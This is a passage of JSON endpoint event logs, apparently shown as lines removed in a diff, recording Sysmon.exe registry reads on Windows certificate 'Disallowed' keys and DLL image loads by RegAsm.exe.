"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": 
"C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864650000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570863869984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865280000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": 
